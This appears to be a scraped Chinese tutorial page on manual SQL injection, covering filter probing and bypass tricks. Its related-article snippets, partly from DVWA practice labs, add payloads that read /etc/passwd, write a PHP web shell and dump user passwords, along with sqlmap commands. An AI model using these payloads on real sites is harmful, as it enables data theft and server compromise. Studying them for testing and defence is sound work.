sql手工注入时的探测技巧汇总

工具的灵活性肯定比不上人,在手工探测的基础上再去自定义工具,才是正道。

sql注入时手工探测技巧
====================================================================================================
*	探测过滤了哪些字符
	select|.|,|;|‘|(|)|#|updatexml|from|where|if|limit|group|by|order|floor|sleep|rand|*|/*|*/information_schema.columns|table_schema|column_name
	**	看下面是否和?id=1返回的结果一样,一样则说明被过滤
		-	空格是否被过滤	?id=0 1
		-	关键字是否被过滤	?id=select1	?id=union1	?id=insert1
	** 绕过
		-	空格可以用%09或/**/替换;
		-	关键字可以用/*!union*/或ununionion替换
		-	information_schema.columns可以用information_schema/**/.columns

*	探测是否未递归替换
	**	看下面的条件是否为假,为假则说明未递归
		-	?id=1	anandd 1=2

*	字符型注入注意,
	**	探测语法完整性
		-	有时可直接用“#”或“ -- ”注释掉尾部多余的单引号
		-	有时不能,必须强制在尾部追加and ‘1‘=‘1来闭合尾部单引号

  

时间: 2024-08-06 16:08:40

sql手工注入时的探测技巧汇总的相关文章

小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+   [写入一句话木马:INTO DUMPLING:MySQL函数,将输入下载在数据库中]

基于dvwa环境下级别为low的SQL手工注入教程

基于dvwa环境下级别为low的SQL手工注入教程: 首先是进入已搭建好的dvwa环境中去(一定要搭建好dvwa环境才能进行下面的操作),这可能会是一些初学者所面临的的第一个问题,比如我,曾为了寻找这个入口,浪费了不少的时间,所以在这里就提一下,最好是能够记住,忘了的话可以随时过来看一下:http://127.0.0.1/DVWA/setup.php. 按照提示点击最下面的按钮创建数据库,创建成功就会直接进入登录页面进行登录,然后就可以直接访问http://127.0.0.1/DVWA/logi

小白日记39:kali渗透测试之Web渗透-SQL手工注入(一)

SQL手工注入(一) SQL注入:通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.[SQL注入原理] ##服务端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器 用户登录判断 SELECT * FROM users WHERE user='uname' AND password='pass'SELECT * FROM users WHERE user='name' AND password='' OR

SQL手工注入技巧

MYSQL篇 1.内置函数和变量 @@datadir,version(),database(),user(),load_file(),outfile() 2.利用concat(),group_concat(),concat_ws()拼接查询结果 实例: xxx.php?id=1 and 1=2 union select 1, group_concat(username,0x3a,password),3 from user 3.使用内建数据库查询表段和字段 查表段: xxx.php?id=1 an

sql 手工注入 补充一(未完待续)

1. 基础用法: ./sqlmap.py -u “注入地址” -v 1 –dbs // 列举数据库./sqlmap.py -u “注入地址” -v 1 –current-db // 当前数据库./sqlmap.py -u “注入地址” -v 1 –users // 列数据库用户./sqlmap.py -u “注入地址” -v 1 –current-user // 当前用户./sqlmap.py -u “注入地址” -v 1 –tables -D “数据库” // 列举数据库的表名./sqlmap

SQL手工注入小结

第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉.否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息. 数字型:and 1=1 and 1=2 判断是否存在注入 字符型:' and '1'='1 ' and '1'='2 搜索型: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='% IIS报错情况下使用: and user>0 (判

SQL手工注入漏洞测试(Sql Server数据库)

还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段.此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL注入. 一.盲注 盲猜爆出表名 通过SQL语句中的and exists(select username from manage)查询,判断manage数据库表表中存在的字段.此处返回内容为正常页面,说

80、SQL手工注入漏洞测试(MySQL数据库)

原文引用https://www.dazhuanlan.com/2019/08/25/5d62593d1d0a1/ 访问网页,进入登陆下方的滚动公告,进行测试注入点?id=1 and 1=1返回正常,?id=1 and 1=2 返回错误,说明有注入点.?id=1 order by 5查询列数.一直减少,直到页面返回正常?id=1 and 1=2 union select 1,version(),database(),4查询版本和数据库名称(此时知道数据库为mozhe_Discuz_StormGro

基础篇——SQL注入(手工注入)

SQL注入 当我们学习一个知识时我们要考虑几个问题:是什么?怎么做?然后进行有条理的学习 是什么? 首先我们要明白SQL注入是什么: sql——结构化查询语言 SQL注入就是在网站url中插入sql语句,执行sql命令,获取数据库内容,达到欺骗服务器的目的. SQL注入的原理:普通用户提交sql查询语句,网站没有对用户输入进行过滤导致执行用户命令 危害及防护 危害:SQL注入可以使入侵者获取后台账号密码.拖库.进入后台破坏.拿shell 防护:设置网站黑名单.限制敏感词汇.对用户输入进行转义.将